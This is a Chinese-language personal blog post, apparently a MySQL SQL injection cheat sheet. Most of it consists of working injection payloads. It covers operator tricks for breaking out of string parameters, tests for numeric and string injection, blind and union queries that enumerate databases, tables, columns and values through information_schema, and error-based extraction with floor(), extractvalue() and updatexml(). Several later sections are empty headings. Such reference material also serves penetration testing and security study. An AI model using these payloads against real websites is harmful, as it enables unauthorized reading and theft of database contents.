<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.ico?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT">





  <link rel="alternate" href="/atom.xml" title="xianyu123's Blog" type="application/atom+xml">






<meta name="description" content="mysql注入备忘录">
<meta property="og:type" content="article">
<meta property="og:title" content="mysql注入备忘录">
<meta property="og:url" content="http://0clickjacking0.github.io/2019/01/25/mysql注入备忘录/index.html">
<meta property="og:site_name" content="xianyu123&#39;s Blog">
<meta property="og:description" content="mysql注入备忘录">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2019-10-18T01:52:20.801Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="mysql注入备忘录">
<meta name="twitter:description" content="mysql注入备忘录">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"right","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '3WG8LC0SCP',
      apiKey: 'fd95735b1b343c09b1c7aada663dfa7a',
      indexName: 'dev_xianyu123',
      hits: {"per_page":10},
      labels: {"input_placeholder":"输入关键字搜索","hits_empty":"没有找到与 ${query} 相关的内容","hits_stats":"搜索到 ${hits} 条相关记录，共耗时 ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://0clickjacking0.github.io/2019/01/25/mysql注入备忘录/">






  <title>mysql注入备忘录 | xianyu123's Blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-right page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">xianyu123's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  
  <div class="algolia-popup popup search-popup">
    <div class="algolia-search">
      <div class="algolia-search-input-icon">
        <i class="fa fa-search"></i>
      </div>
      <div class="algolia-search-input" id="algolia-search-input"></div>
    </div>

    <div class="algolia-results">
      <div id="algolia-stats"></div>
      <div id="algolia-hits"></div>
      <div id="algolia-pagination" class="algolia-pagination"></div>
    </div>

    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
  </div>




    </div>
  
</nav>





 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://0clickjacking0.github.io/2019/01/25/mysql注入备忘录/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="xianyu123">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="xianyu123's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">mysql注入备忘录</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-01-25T21:57:42+08:00">
                2019-01-25
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Web-Security/" itemprop="url" rel="index">
                    <span itemprop="name">Web Security</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2019/01/25/mysql注入备忘录/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count valine-comment-count" data-xid="/2019/01/25/mysql注入备忘录/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          
             <span id="/2019/01/25/mysql注入备忘录/" class="leancloud_visitors" data-flag-title="mysql注入备忘录">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数&#58;</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>mysql注入备忘录</p>
<a id="more"></a>
<h1 id="基本"><a href="#基本" class="headerlink" title="基本"></a>基本</h1><h2 id="information-schema"><a href="#information-schema" class="headerlink" title="information_schema"></a>information_schema</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">information_schema这这个数据库中保存了MySQL服务器所有数据库的信息。</span><br><span class="line">如数据库名，数据库的表，表栏的数据类型与访问权限等。</span><br><span class="line">再简单点，这台MySQL服务器上，到底有哪些数据库、各个数据库有哪些表，</span><br><span class="line">每张表的字段类型是什么，各个数据库要什么权限才能访问，等等信息都保存在information_schema里面。</span><br><span class="line"></span><br><span class="line">information_schema的表schemata中的列schema_name记录了所有数据库的名字</span><br><span class="line">information_schema的表tables中的列table_schema记录了所有数据库的名字</span><br><span class="line">information_schema的表tables中的列table_name记录了所有数据库的表的名字</span><br><span class="line">information_schema的表columns中的列table_schema记录了所有数据库的名字</span><br><span class="line">information_schema的表columns中的列table_name记录了所有数据库的表的名字</span><br><span class="line">information_schema的表columns中的列column_name记录了所有数据库的表的列的名字</span><br></pre></td></tr></table></figure>
<h2 id="查看当前系统版本"><a href="#查看当前系统版本" class="headerlink" title="查看当前系统版本"></a>查看当前系统版本</h2><ul>
<li>@@version_compile_os</li>
</ul>
<h2 id="查看当前数据库版本"><a href="#查看当前数据库版本" class="headerlink" title="查看当前数据库版本"></a>查看当前数据库版本</h2><ul>
<li>version()</li>
<li>@@version</li>
<li>@@global.version</li>
</ul>
<h2 id="当前登录用户"><a href="#当前登录用户" class="headerlink" title="当前登录用户"></a>当前登录用户</h2><ul>
<li>user()</li>
<li>current_user()</li>
<li>system_user()</li>
<li>session_user()</li>
</ul>
<h2 id="当前使用的数据库"><a href="#当前使用的数据库" class="headerlink" title="当前使用的数据库"></a>当前使用的数据库</h2><ul>
<li>database()</li>
<li>schema()</li>
</ul>
<h2 id="路径相关"><a href="#路径相关" class="headerlink" title="路径相关"></a>路径相关</h2><ul>
<li>@@BASEDIR : mysql安装路径：</li>
<li>@@SLAVE_LOAD_TMPDIR : 临时文件夹路径：</li>
<li>@@DATADIR : 数据存储路径：</li>
<li>@@CHARACTER_SETS_DIR : 字符集设置文件路径</li>
<li>@@LOG_ERROR : 错误日志文件路径：</li>
<li>@@PID_FILE : pid-file文件路径</li>
<li>@@BASEDIR : mysql安装路径：</li>
<li>@@SLAVE_LOAD_TMPDIR : 临时文件夹路径：</li>
</ul>
<h2 id="联合数据"><a href="#联合数据" class="headerlink" title="联合数据"></a>联合数据</h2><ul>
<li>CONCAT()</li>
<li>GROUP_CONCAT()</li>
<li>CONCAT_WS()</li>
</ul>
<h2 id="字母-数字相关"><a href="#字母-数字相关" class="headerlink" title="字母/数字相关"></a>字母/数字相关</h2><ul>
<li>ASCII(): 获取字母的ascii码值</li>
<li>BIN(): 返回值的二进制串表示</li>
<li>CONV(): 进制转换</li>
<li>FLOOR()</li>
<li>ROUND()</li>
<li>LOWER()：转成小写字母</li>
<li>UPPER(): 转成大写字母</li>
<li>HEX():十六进制编码</li>
<li>UNHEX()：十六进制解码</li>
</ul>
<h2 id="字符串截取"><a href="#字符串截取" class="headerlink" title="字符串截取"></a>字符串截取</h2><ul>
<li>mid()</li>
<li>substr()</li>
<li>substring()</li>
<li>left()</li>
<li>right()</li>
</ul>
<h2 id="注释"><a href="#注释" class="headerlink" title="注释"></a>注释</h2><ul>
<li>– (后面有一个空格)</li>
<li>#</li>
<li>/**/</li>
</ul>
<h2 id="字符串运算符"><a href="#字符串运算符" class="headerlink" title="字符串运算符"></a>字符串运算符</h2><p><strong>1、算术运算</strong></p>
<p>加：+</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&apos;+&apos;, 拼接的语句：where username=&apos;&apos;+&apos;&apos;</span><br></pre></td></tr></table></figure>
<p>减：-</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&apos;-&apos; 拼接的语句：where username=&apos;&apos;-&apos;&apos;</span><br></pre></td></tr></table></figure>
<p>乘：*</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&apos;*&apos; 拼接的语句：where username=&apos;&apos;*&apos;&apos;</span><br></pre></td></tr></table></figure>
<p>除：/</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&apos;/6# 拼接的语句：where username=&apos;&apos;/6#</span><br></pre></td></tr></table></figure>
<p>取余：%</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&apos;%1# 拼接的语句：where username=&apos;&apos;%1#</span><br></pre></td></tr></table></figure>
<p><strong>2、 位操作运算</strong></p>
<p>我们可以使用当字符串和数字运算的时候类型转换的问题进行利用</p>
<p>我们可以用的位运算符有：</p>
<p>和运算：&amp;</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&apos;&amp;0# 拼接的语句：where username=&apos;&apos;&amp;0#&apos;</span><br></pre></td></tr></table></figure>
<p>或运算：|</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&apos;|0# 拼接的语句：where username=&apos;&apos;|0#&apos;</span><br></pre></td></tr></table></figure>
<p>异或运算：^</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&apos;^0# 拼接的语句：where username=&apos;&apos;^0#&apos;</span><br></pre></td></tr></table></figure>
<p>移位操作：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&apos;&lt;&lt;0# &apos;&gt;&gt;0#</span><br></pre></td></tr></table></figure>
<p>位非（~）：这里位非运算符由于是在表达式之前的</p>
<p><strong>3、 比较运算符</strong></p>
<p>安全等于：&lt;=&gt;</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&apos;=0&lt;=&gt;1# 拼接的语句：where username=&apos;&apos;=0&lt;=&gt;1#&apos;</span><br></pre></td></tr></table></figure>
<p>不等于&lt;&gt;(!=)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&apos;=0&lt;&gt;0# 拼接的语句：where username=&apos;&apos;=0&lt;&gt;0#&apos;</span><br></pre></td></tr></table></figure>
<p>大小于&gt;或&lt;</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&apos;&gt;-1# 拼接的语句：where username=&apos;&apos;&gt;-1#</span><br></pre></td></tr></table></figure>
<p><strong>4、其他</strong> </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&apos;+1 is not null#  &apos;in(-1,1)#  &apos;not in(1,0)#  &apos;like 1#  &apos;REGEXP 1#  &apos;BETWEEN 1 AND 1#  &apos;div 1#  &apos;xor 1#  &apos;=round(0,1)=&apos;1  &apos;&lt;&gt;ifnull(1,2)=&apos;1</span><br></pre></td></tr></table></figure>
<h1 id="注入技术"><a href="#注入技术" class="headerlink" title="注入技术"></a>注入技术</h1><h2 id="判断是否存在注入"><a href="#判断是否存在注入" class="headerlink" title="判断是否存在注入"></a>判断是否存在注入</h2><p>假设网址为<code>www.xxx.com/test.php?id=1</code></p>
<h3 id="数值型注入"><a href="#数值型注入" class="headerlink" title="数值型注入"></a>数值型注入</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">id=1+1</span><br><span class="line">id=1-1</span><br><span class="line">id=1/1</span><br><span class="line">id=1*0</span><br><span class="line">id=-1 or 1=1</span><br><span class="line">id=-1 or 3-1</span><br><span class="line">id=1 and 1=1</span><br><span class="line">id=1 and 1=2</span><br></pre></td></tr></table></figure>
<h3 id="字符型注入"><a href="#字符型注入" class="headerlink" title="字符型注入"></a>字符型注入</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">id=1'</span><br><span class="line">id=1"</span><br><span class="line">id=1' or '1'='1</span><br><span class="line">id=1" or "1"="1</span><br></pre></td></tr></table></figure>
<h2 id="联合查询"><a href="#联合查询" class="headerlink" title="联合查询"></a>联合查询</h2><h3 id="库"><a href="#库" class="headerlink" title="库"></a>库</h3><h4 id="库名长度"><a href="#库名长度" class="headerlink" title="库名长度"></a>库名长度</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="keyword">length</span>(<span class="keyword">database</span>())</span><br></pre></td></tr></table></figure>
<h4 id="当前库名"><a href="#当前库名" class="headerlink" title="当前库名"></a>当前库名</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1. database()</span><br><span class="line">2. schema()</span><br></pre></td></tr></table></figure>
<h4 id="所以库名"><a href="#所以库名" class="headerlink" title="所以库名"></a>所以库名</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select group_concat(schema_name) from information_schema.schemata</span><br></pre></td></tr></table></figure>
<h3 id="表"><a href="#表" class="headerlink" title="表"></a>表</h3><h4 id="表的张数"><a href="#表的张数" class="headerlink" title="表的张数"></a>表的张数</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">#表张数 &lt; 10</span><br><span class="line"><span class="keyword">select</span> <span class="keyword">count</span>(*) <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema=库名的十六进制</span><br><span class="line"></span><br><span class="line">#表张数 &gt;= <span class="number">10</span></span><br><span class="line"><span class="keyword">ascii</span>(<span class="keyword">mid</span>((<span class="keyword">select</span> <span class="keyword">count</span>(*) <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema=<span class="number">0x74657374</span>),<span class="number">1</span>,<span class="number">1</span>))=<span class="number">49</span></span><br></pre></td></tr></table></figure>
<h4 id="表名的长度"><a href="#表名的长度" class="headerlink" title="表名的长度"></a>表名的长度</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">1.借助limit求表名长度的方法</span><br><span class="line"><span class="keyword">select</span> <span class="keyword">ascii</span>(<span class="keyword">mid</span>((<span class="keyword">length</span>((<span class="keyword">select</span> table_name <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema=库名的十六进制 <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>))),<span class="number">1</span>,<span class="number">1</span>))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="number">2.</span>借助<span class="keyword">group_concat</span>求表名长度的方法</span><br><span class="line"><span class="keyword">select</span> <span class="keyword">ascii</span>(<span class="keyword">mid</span>((<span class="keyword">length</span>((<span class="keyword">select</span> <span class="keyword">group_concat</span>(table_name) <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema=<span class="keyword">database</span>()))),<span class="number">1</span>,<span class="number">1</span>))=<span class="number">49</span></span><br></pre></td></tr></table></figure>
<h4 id="表名"><a href="#表名" class="headerlink" title="表名"></a>表名</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">1. 这种方法需要借助limit，这种方法需要注入出表的张数，也需要注入出表名的长度 </span><br><span class="line"><span class="keyword">select</span> table_name <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema=库名的十六进制 <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="number">2.</span> 不需要借助<span class="keyword">limit</span>,一次性列出所有的表名，这种方法需要注入出表名的长度，不需要注入出表的张数</span><br><span class="line"><span class="keyword">ascii</span>(<span class="keyword">mid</span>(((<span class="keyword">select</span> <span class="keyword">group_concat</span>(table_name) <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema=库名的十六进制),<span class="number">1</span>,<span class="number">1</span>))=<span class="number">49</span></span><br><span class="line">或者</span><br><span class="line"><span class="keyword">ascii</span>(<span class="keyword">mid</span>(((<span class="keyword">select</span> <span class="keyword">group_concat</span>(table_name) <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema=<span class="keyword">database</span>())),<span class="number">1</span>,<span class="number">1</span>))=<span class="number">49</span></span><br></pre></td></tr></table></figure>
<h3 id="列"><a href="#列" class="headerlink" title="列"></a>列</h3><h4 id="列的个数"><a href="#列的个数" class="headerlink" title="列的个数"></a>列的个数</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">#列个数 &lt; 10</span><br><span class="line"><span class="keyword">select</span> <span class="keyword">count</span>(*) <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_name=表名的<span class="number">16</span>进制</span><br><span class="line"></span><br><span class="line">#列个数 &gt;= <span class="number">10</span></span><br><span class="line"><span class="keyword">ascii</span>(<span class="keyword">mid</span>((<span class="keyword">select</span> <span class="keyword">count</span>(*) <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_name=表名的<span class="number">16</span>进制),<span class="number">1</span>,<span class="number">1</span>))=<span class="number">49</span></span><br></pre></td></tr></table></figure>
<h4 id="列名的长度"><a href="#列名的长度" class="headerlink" title="列名的长度"></a>列名的长度</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">1.借助limit求列名长度的方法</span><br><span class="line"><span class="keyword">select</span> <span class="keyword">ascii</span>(<span class="keyword">mid</span>((<span class="keyword">length</span>((<span class="keyword">select</span> column_name <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_name=表名的<span class="number">16</span>进制 <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>))),<span class="number">1</span>,<span class="number">1</span>))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="number">2.</span>借助<span class="keyword">group_concat</span>求列名长度的方法</span><br><span class="line"><span class="keyword">select</span> <span class="keyword">ascii</span>(<span class="keyword">mid</span>(<span class="keyword">length</span>((<span class="keyword">select</span> <span class="keyword">group_concat</span>(column_name) <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_name=表名的<span class="number">16</span>进制)),<span class="number">1</span>,<span class="number">1</span>))</span><br></pre></td></tr></table></figure>
<h4 id="列名"><a href="#列名" class="headerlink" title="列名"></a>列名</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">1. 这种方法需要借助limit，这种方法需要注入出列的张数，也需要注入出列名的长度 </span><br><span class="line"><span class="keyword">select</span> column_name <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_name=表名的<span class="number">16</span>进制 <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="number">2.</span> 不需要借助<span class="keyword">limit</span>,一次性列出所有的列名，这种方法需要注入出列名的长度，不需要注入出列的个数</span><br><span class="line"><span class="keyword">select</span> <span class="keyword">ascii</span>(<span class="keyword">mid</span>(((<span class="keyword">select</span> <span class="keyword">group_concat</span>(column_name) <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_name=表名的十六进制)),<span class="number">1</span>,<span class="number">1</span>))=<span class="number">49</span></span><br></pre></td></tr></table></figure>
<h3 id="值"><a href="#值" class="headerlink" title="值"></a>值</h3><h4 id="值的个数"><a href="#值的个数" class="headerlink" title="值的个数"></a>值的个数</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="keyword">count</span>(*) <span class="keyword">from</span> 表名 <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span></span><br></pre></td></tr></table></figure>
<h4 id="值的长度"><a href="#值的长度" class="headerlink" title="值的长度"></a>值的长度</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1.借助group_concat求值长度的方法</span><br><span class="line">ascii(mid(length((<span class="keyword">select</span> <span class="keyword">group_concat</span>(<span class="keyword">id</span>,<span class="keyword">name</span>) <span class="keyword">from</span> 库名.表名)),<span class="number">1</span>,<span class="number">1</span>))</span><br></pre></td></tr></table></figure>
<h4 id="值-1"><a href="#值-1" class="headerlink" title="值"></a>值</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="keyword">group_concat</span>(字段<span class="number">1</span>,字段<span class="number">2</span> separator <span class="number">0x2c</span>) <span class="keyword">from</span> 库名.表名</span><br></pre></td></tr></table></figure>
<h2 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h2><h3 id="floor"><a href="#floor" class="headerlink" title="floor()"></a>floor()</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> <span class="keyword">test</span> <span class="keyword">where</span> <span class="keyword">id</span>=<span class="number">1</span> <span class="keyword">and</span> (<span class="keyword">select</span> <span class="number">1</span> <span class="keyword">from</span> (<span class="keyword">select</span> <span class="keyword">count</span>(*),<span class="keyword">concat</span>(<span class="keyword">user</span>(),<span class="keyword">floor</span>(<span class="keyword">rand</span>(<span class="number">0</span>)*<span class="number">2</span>))x <span class="keyword">from</span> information_schema.tables <span class="keyword">group</span> <span class="keyword">by</span> x)a);</span><br></pre></td></tr></table></figure>
<h3 id="extractvalue-有长度限制-最长32位"><a href="#extractvalue-有长度限制-最长32位" class="headerlink" title="extractvalue()(有长度限制,最长32位)"></a>extractvalue()(有长度限制,最长32位)</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> table_id <span class="keyword">where</span> <span class="keyword">id</span>=<span class="number">1</span> <span class="keyword">and</span> (extractvalue(<span class="number">1</span>,<span class="keyword">concat</span>(<span class="number">0x7e</span>,(<span class="keyword">select</span> <span class="keyword">user</span>()),<span class="number">0x7e</span>)));</span><br></pre></td></tr></table></figure>
<h3 id="updatexml-有长度限制-最长32位"><a href="#updatexml-有长度限制-最长32位" class="headerlink" title="updatexml()(有长度限制,最长32位)"></a>updatexml()(有长度限制,最长32位)</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> <span class="keyword">test</span> <span class="keyword">where</span> <span class="keyword">id</span>=<span class="number">1</span> <span class="keyword">and</span> (updatexml(<span class="number">1</span>,<span class="keyword">concat</span>(<span class="number">0x7e</span>,(<span class="keyword">select</span> <span class="keyword">user</span>()),<span class="number">0x7e</span>),<span class="number">1</span>));</span><br><span class="line"></span><br><span class="line"><span class="keyword">select</span> updatexml(<span class="number">1</span>,<span class="keyword">mid</span>((<span class="keyword">select</span> <span class="keyword">group_concat</span>(table_name) <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema=<span class="keyword">database</span>()),<span class="number">1</span>,<span class="number">10</span>),<span class="number">1</span>)</span><br></pre></td></tr></table></figure>
<h3 id="geometrycollection"><a href="#geometrycollection" class="headerlink" title="geometrycollection()"></a>geometrycollection()</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<h3 id="multipoint"><a href="#multipoint" class="headerlink" title="multipoint()"></a>multipoint()</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<h3 id="polygon"><a href="#polygon" class="headerlink" title="polygon()"></a>polygon()</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<h3 id="multipolygon"><a href="#multipolygon" class="headerlink" title="multipolygon()"></a>multipolygon()</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<h3 id="linestring"><a href="#linestring" class="headerlink" title="linestring()"></a>linestring()</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>
